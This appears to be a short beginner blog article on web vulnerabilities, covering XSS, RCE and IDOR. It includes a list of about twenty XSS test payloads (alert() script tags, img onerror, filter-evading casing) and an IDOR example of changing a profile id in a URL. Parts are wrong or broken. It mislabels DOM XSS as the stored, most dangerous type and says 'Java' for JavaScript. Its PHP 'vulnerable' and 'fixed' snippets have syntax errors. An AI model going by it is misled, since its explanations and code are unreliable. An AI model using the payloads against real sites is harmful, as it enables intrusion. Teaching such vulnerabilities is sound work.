TASK 6 : XSS- RCE- IDOR
Hello everyone , In this article, I will explain some of the vulnerabilities
XSS(Cross-Site Scripting):
It is the injection of exploited codes into places accessible by the user on the site
- iframe tags
- img attributes
- input tags
- link tags
- the background attribute of table tags and td tags
- div tags
- object tags
XSS TYPES:
- dom xss
- stored xss
- reflected xss
Difference of xss types from others:
Dom xss It is the most dangerous type, the code you inject is recorded in the background The code will run automatically whenever a user enters the site where you place the code. But this is not the case with reflected xss In reflected xss, the area where the code is injected is written to the url and you must send the same url to the target
How to Protect Xss attack:
We can follow a filtering method against payloads XSS can be prevented by filtering to prevent HTML and Java from being executed in inputs
Vuln Code:
$a = $ POST["isim"];
echo #a;
?>
Solution:
$a = htmlspecialchars($_POST["isim"]);
echo #a;
?>Some payloads
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>Lets exploit with burp !!
RCE(remote code execution):
Although this vulnerability is difficult to find, it is a very critical vulnerability that allows the site to execute code as if using a terminal.
IDOR:
We can call it a vulnerability that fakes identity through objects They can gain quick access to users’ accounts or account information by imitating objects that belong to someone on the site and have an ID
When a user with id 10 looks at the url after entering their profile
See website.com/myprofile?id10 in the site url
If you can access someone else’s account when you change the last id in the URL to 11, this vulnerability exists
quotation: gorkemozkanat.github.io / infinitumit.com.tr
